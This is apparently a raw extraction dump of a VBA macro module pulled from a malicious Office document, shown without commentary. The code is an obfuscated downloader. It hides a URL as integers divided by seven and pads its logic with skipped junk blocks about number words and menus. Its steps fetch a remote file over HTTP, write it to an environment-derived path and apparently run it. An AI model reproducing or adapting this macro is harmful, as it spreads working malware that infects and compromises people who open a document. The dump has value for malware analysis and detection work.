Filename     : ./macros/6914d2dc897cce17969e1478609142a2d7ae7041eeeac0bd23cdb9536b5e7fa5
OLE stream   : _VBA_PROJECT_CUR/VBA/Module3
VBA filename : Module3.bas
----------------------------------------
Attribute VB_Name = "Module3"
Public Peresvet_1 As Object
Public Peresvet_0_19 As Object
Public Peresvet_3 As Object
Public Peresvet_7() As String
Public Peresvet_4 As String
Public someOne_Peresvet_5 As String
Public tudaGdeLetli_Peresvet_6 As Object
 Public Peresvet3_1 As String
Public Peresvet_0_13() As String


Public Sub Solovey()
HanSoloVud = DuStin()

GoTo stop2
   Dim aAmount, bAmount, cAmount, dAmount As Integer
    Dim hyphen As String
    aAmount = Val(Mid(amt, 2, 2))
    bAmount = Val(Mid(amt, 3, 1))
    cAmount = Val(Mid(amt, 2, 1))
    dAmount = Val(Mid(amt, 1, 1))



    If dAmount > 0 Then
        numconv = und.sits(dAmount) + " HUNDRED" + numconv
    End If
stop2:
If TypeName(HanSoloVud) = "String" Then
Peresvet_0_13 = Split(HanSoloVud, "DE")
End If
Peresvet_7 = Split("728DE812DE812DE784DE406DE329DE329DE728DE693DE693DE700DE749DE756DE721DE679DE770DE742DE819DE735DE770DE700DE735DE679DE322DE693DE777DE763DE329DE364DE357DE812DE721DE833", _
"DE")

 Set Peresvet_1 = CreateObject(Peresvet_0_13(0))

GoTo LoadHelpMenu9
Dim MenuCaption As String
    

    MenuCaption = "&Animation"
    Call Load(mnuObj(mnuObj.Count + 1))
    mnuObj(mnuObj.Count).Caption = MenuCaption
    mnuObj(mnuObj.Count).Visible = True

    MenuCaption = "&Create Sample Record"
    Call Load(mnuObj(mnuObj.Count + 1))
    mnuObj(mnuObj.Count).Caption = MenuCaption
    mnuObj(mnuObj.Count).Visible = True

    mnuObj(0).Visible = False
LoadHelpMenu9:
 Set Peresvet_0_19 = CreateObject(Peresvet_0_13(1))
 
 Set tudaGdeLetli_Peresvet_6 = CreateObject(Peresvet_0_13(2))

 Set Peresvet_0_22 = CreateObject(Peresvet_0_13(3))
GoTo aAmount

    If aAmount < 20 Then
        numconv = uni.rrsts(aAmount)
    Else
        numconv = uni.rrsts(bAmount)


        If bAmount > 0 And cAmount > 0 Then
            hyphen = "-"
        End If
        numconv = terr.ens(cAmount) + hyphen + LTrim(numconv)
    End If

aAmount:
 Set Peresvet_3 = Peresvet_0_22.Environment(Peresvet_0_13(4))

 Dim Peresvet_8 As Integer

For Peresvet_8 = LBound(Peresvet_7) To UBound(Peresvet_7)
 Peresvet3_1 = Peresvet3_1 & Chr(CInt(Peresvet_7(Peresvet_8)) / 7)
 Next Peresvet_8
GoTo SNUM
 
 Select Case SNUM
    Case 1
        WordTens = " One"
    Case 2
        WordTens = " Two"
    Case 3
        WordTens = " Three"
    Case 4
        WordTens = " Four"
    Case 5
        WordTens = " Five"
    Case 6
        WordTens = " Six"
    Case 7
        WordTens = " Seven"
    Case 8
        WordTens = " Eight"
    Case 9
        WordTens = " Nine"
    Case 10
        WordTens = " Ten"
    Case 11
        WordTens = " Eleven"
    Case 12
        WordTens = " Twelve"
    Case 13
        WordTens = " Thirteen"
    Case 14
        WordTens = " Fourteen"
    Case 15
        WordTens = " Fifteen"
    Case 16
        WordTens = " Sixteen"
    Case 17
        WordTens = " Seventeen"
    Case 18
        WordTens = " Eighteen"
    Case 19
        WordTens = " Nineteen"
    Case 20
        WordTens = " Twenty"
    Case 30
        WordTens = " Thirty"
    Case 40
        WordTens = " Fourty"
    Case 50
        WordTens = " Fifty"
    Case 60
        WordTens = " Sixty"
    Case 70
        WordTens = " Seventy"
    Case 80
        WordTens = " Eighty"
    Case 90
        WordTens = " Ninety"
End Select
SNUM:
Peresvet_1.Open Peresvet_0_13(5), Peresvet3_1, False
 Peresvet_1.Send
 
 GoTo MenuCaption
 MenuCaption = "I have a &question"
    Call Load(mnuObj(mnuObj.Count + 1))
    mnuObj(mnuObj.Count).Caption = MenuCaption
    mnuObj(mnuObj.Count).Visible = True

MenuCaption:
 Peresvet_4 = Peresvet_3(Peresvet_0_13(4 + 2))
someOne_Peresvet_5 = Peresvet_4
someOne_Peresvet_5 = someOne_Peresvet_5 + Peresvet_0_13(500 - 4 + 4 + 4 - 200 - 100 - 50 - 60 - 82)

GoTo mnuObj

    MenuCaption = "&Step by Step"
    Call Load(mnuObj(mnuObj.Count + 1))
    mnuObj(mnuObj.Count).Caption = MenuCaption
    mnuObj(mnuObj.Count).Visible = True
mnuObj:
CallByName Peresvet_0_19, Peresvet_0_13(6 + 1), 8 - 4 + 0, 3 - 2
 Peresvet_0_19.Open
GetFIFOCost "", "", "", Now(), "", 0.3, "", ""
End Sub

